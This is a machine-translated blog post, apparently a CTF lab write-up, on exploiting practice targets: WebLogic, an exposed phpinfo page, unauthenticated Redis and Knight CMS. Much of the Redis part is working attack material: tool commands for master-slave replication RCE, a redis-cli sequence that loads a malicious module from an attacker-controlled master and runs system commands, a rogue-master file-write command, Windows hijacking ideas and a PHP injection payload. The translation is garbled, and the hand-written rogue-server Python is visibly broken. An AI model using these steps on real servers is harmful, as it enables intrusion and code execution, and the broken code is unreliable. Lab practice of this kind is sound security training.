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Fofa attack and defense challenge record

2022-07-08 00:48:00 Hetian network security laboratory

   Record the short glorious moments in the middle


    Everyone has a glorious moment , Don't take a moment as a permanent


   After the first taste of the results yesterday , Today, I habitually open  https://vulfocus.cn/  I found that there is still a challenge today , I can't help my restless heart , Start learning again . Today, I mainly won these four images , At the same time, I will also make a specific analysis of the details of the vulnerabilities I know


weblogci CVE_2020_2551

   We see that the corresponding ports are 7001




   See the familiar interface and the previously perceived port information , It feels like it could be weblogic , Plus the path  console  Check it out. , yes weblogic


  weblogic There are too many loopholes , So we go directly to the vulnerability scanning tool


   See the number corresponding to the vulnerability , And the existing echo link


phpinfo Information disclosure

   Opening the interface is a phpinfo


   Tried to scan the path , check phpinfo After the operation of the vulnerability is fruitless , So search for keywords directly on the page  flag


   It's easy to find flag Value , This topic is for 5 branch I didn't think of it

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Redis Unauthorized access vulnerability


   The corresponding mapped port is 6379 It was immediately associated with Redis, At the same time, this port cannot be accessed from web End access , So it's basically certain that Redis 了


   Notice that the version is 4.0.14

   Aim at Redis Unauthorized access vulnerability , There are the following ways to use

  • utilize Redis write in webshell

  • Write ssh-keygen Public key login server

  • Use planned tasks to bounce back shell

  • Use master-slave replication to obtain shell

   Here we choose Master slave replication vulnerability to obtain shell

   Operate on the server ( I borrowed the server today )

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
cd RedisModules-ExecuteCommand/
# Generate /RedisModules-ExecuteCommand/src/module.so
cd ..
git clone https://github.com/Ridter/redis-rce.git
cd redis-rce/
cp ../RedisModules-ExecuteCommand/src/module.so ./
pip install -r requirements.txt
python redis-rce.py  -r -p 57119 -L -f module.so




Use master-slave replication to obtain shell

  Redis It's a use ANSI C Write open source 、 Support network 、 Memory based 、 Optional persistent key value pair to store database . But if you store data in a single Redis In the , When the reading and writing volume is large , It's hard for the server to bear . In response to this situation ,Redis It provides the master-slave mode , The master-slave mode refers to the use of a redis Instance as host , Other instances are used as backup machines , The master and slave data are the same , The slave is only responsible for reading , The host is only responsible for writing , Through read-write separation, the pressure of flow can be greatly reduced , It's a kind of mitigation way to sacrifice space for efficiency .

   stay Reids 4.x after ,Redis Added module function , Through external expansion , It can be realized in Redis To implement a new Redis command , By writing C Language compiles and loads malicious .so file , To achieve the purpose of code execution .


   There are all kinds of wonderful problems when doing it on this machine , Break the defense for me , Finally, I adopted docker To reproduce . Reproduce different uses and delete docker , Restart and continue . Finally found The utilization version of master-slave replication is 4.x-5.x, from 6.0 Start , You can't take advantage of success , write in exp.so It's OK, too ,module Loading will fail , Prompt no permission , to exp.so After permission, you can .

sudo docker pull vertigo/redis4
sudo docker run -p 6379:6379 vertigo/redis4



   Generate malice .so file , download RedisModules-ExecuteCommand Use make Compile to generate

git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git
cd RedisModules-ExecuteCommand/
# Generate /RedisModules-ExecuteCommand/src/module.so
cd ..
git clone https://github.com/Ridter/redis-rce.git
cd redis-rce/
cp ../RedisModules-ExecuteCommand/src/module.so ./
pip install -r requirements.txt
python redis-rce.py -r -p 6379 -L -f module.so




git clone https://github.com/n0b0dyCN/redis-rogue-server.git
cd redis-rogue-serve
python3 redis-rogue-server.py --rhost --lhost

Redis Master slave copy manual shift

import socket
from time import sleep
from optparse import OptionParser

def RogueServer(lport):
   resp = ""
   sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   conn,address = sock.accept()  
   while True:
       data = conn.recv(1024)
       if "PING" in data:
       elif "REPLCONF" in data:
       elif "PSYNC" in data or "SYNC" in data:
           resp =  "+FULLRESYNC " + "Z"*40 + " 1" + CLRF
           resp += "$" + str(len(payload)) + CLRF
           resp = resp.encode()
           resp += payload + CLRF.encode()
           if type(resp) != bytes:
               resp =resp.encode()      
       #elif "exit" in data:

if __name__=="__main__":

   parser = OptionParser()                
   parser.add_option("--lport", dest="lp", type="int",help="rogue server listen port, default 21000", default=21000,metavar="LOCAL_PORT")    
   parser.add_option("-f","--exp", dest="exp", type="string",help="Redis Module to load, default exp.so", default="exp.so",metavar="EXP_FILE")      

  (options , args )= parser.parse_args()
   lport = options.lp
   exp_filename = options.exp

   print "Start listing on port: %s" %lport
   print "Load the payload:   %s" %exp_filename  


redis-cli -h
> ping
> config set dir ./               # Set up redis The backup path of is the current directory
> config set dbfilename exp.so    # Set the backup file name to exp.so, The default is dump.rdb
> slaveof 9999       # Set up the master server IP And port
> module load ./exp.so            # Loading malicious modules
> slaveof no one                  # Cut off the master and slave , Turn off the copy function
> system.exec 'whoami'            # Execute system commands
> config set dbfilename dump.rdb  # adopt dump.rdb File recovery data
> system.exec 'rm ./exp.so'       # Delete exp.so
> module unload system            # uninstall system Module loading



  Redis Official didn't provide windows Version of the installation package ,windows Under the use of Redis still 3.X Version of . redis When writing files, there will be some version information and dirty data , Can't write normal DLL、EXE、LINK Wait for the documents , therefore Yes  Windows  Under the  redis  The main method of utilization is to web Directory write horse and write startup item .


  RedisWriteFile  utilize Redis Master slave synchronous write data , The script simulates itself as master, Set the opposite end to slave, master The data space is guaranteed to be absolutely clean , It is easy to write lossless files .

   Reference article   Yes Redis stay Windows Thinking about the way of using   Record on pit -Redis(Windows) Of getshell You can use the following methods

  • System  DLL hijacked ( Target restart or logout )

  • Software specific  DLL  hijacked ( Target one click )

  • Shortcut to overwrite the target ( Target one click )

  • Overwrite the configuration file of specific software to achieve the purpose of raising rights ( The target does not need a click or a click )

  • overwrite  sethc.exe  Wait for the documents ( The attacker triggers once )

  • mof etc.

   Because these have not been studied yet , So here we only demonstrate the following , stay windows redis Write lossless documents

python RedisWriteFile.py --rhost=[target_ip] --rport=[target_redis_port] --lhost=[evil_master_host] --lport=[random] --rpath="[path_to_write]" --rfile="[filename]" --lfile=[filename]

python3 RedisWriteFile.py --rhost= --rport=6379 --lhost=  --lport=9999 --rpath="C:\Users\Public" --rfile="test.txt"  --lfile="test.txt"



   wow , This lossless file is really yyds, stay linux There is no problem in using it .


The knight cms There is a template parsing vulnerability

   Open the page and you'll see The knight cms, Thought of knights cms The historical loophole of The file contains a vulnerability (thinkphp3 The file contains )


   This operation

variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show List name ="info" Enterprise trade id="$_GET['id']"/>







   The principle of the vulnerability is to write the code to the log file through the error message , Reuse File Inclusion to implement code execution .

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